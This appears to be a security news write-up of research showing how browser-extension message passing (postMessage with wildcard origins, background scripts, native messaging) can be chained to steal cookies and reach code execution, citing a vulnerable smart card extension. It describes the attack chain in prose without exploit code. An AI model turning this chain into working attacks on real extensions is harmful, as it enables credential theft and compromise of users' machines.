The researchers demonstrate a novel technique to achieve universal code execution (UCE) by chaining messaging APIs in browsers and browser extensions, which bypasses both the Same Origin Policy and browser sandbox restrictions.
By leveraging the capabilities of browser extension APIs and native messaging protocols to achieve UCE, which is similar to a previously known technique where messages can be relayed from a web page to native applications.
Browser extensions use content scripts to interact with web pages, which run in isolated environments for security reasons. To perform complex tasks, content scripts communicate with background scripts using message passing APIs like chrome.runtime.sendMessage.
Background scripts listen for messages using chrome.runtime.onMessage.addListener and can respond with data, which is restricted to within the same extension for security reasons.
Content scripts can communicate with web pages and background scripts using postMessage, but a vulnerability exists if origin validation is missing in the postMessage handler. While intended for cross-window messaging, postMessage allows content scripts to receive messages from the web page.
If the content script listens for any origin using a wildcard (*), malicious web pages can exploit this communication channel to bypass security restrictions, which can potentially compromise the extension’s functionality or even inject malicious content into the web page.
A malicious webpage can exploit a vulnerable browser extension with content script and background script communication to steal cookies from whitelisted domains, which inject content scripts into all pages and have access to cookies on specific sites.
The webpage sends a message to the background script requesting cookies from a whitelisted domain, and then retrieves the cookies and sends them back to the webpage, which bypasses the Same Origin Policy, allowing the webpage to access data from a different origin.
Browser extensions can use native messaging to communicate with native applications on the user’s computer, which can be exploited by malicious extensions to achieve code execution by leveraging a content script with a wildcard permission to inject code into any webpage.
The injected script can then call the background script using postMessage, which in turn calls the native application through sendNativeMessage, and if the native application has a vulnerable message handler, it can lead to arbitrary code execution on the user’s machine.
According to Spaceraccoon, a PKI smart card extension with a large user base was found vulnerable to command execution, which injects a content script that listens for messages from any webpage due to a permissive wildcard configuration.
The message is then passed to the background script, which forwards it to a native application. The attacker can exploit a weakness in the message validation by sending a crafted message with a malicious DLL path, enabling arbitrary code execution.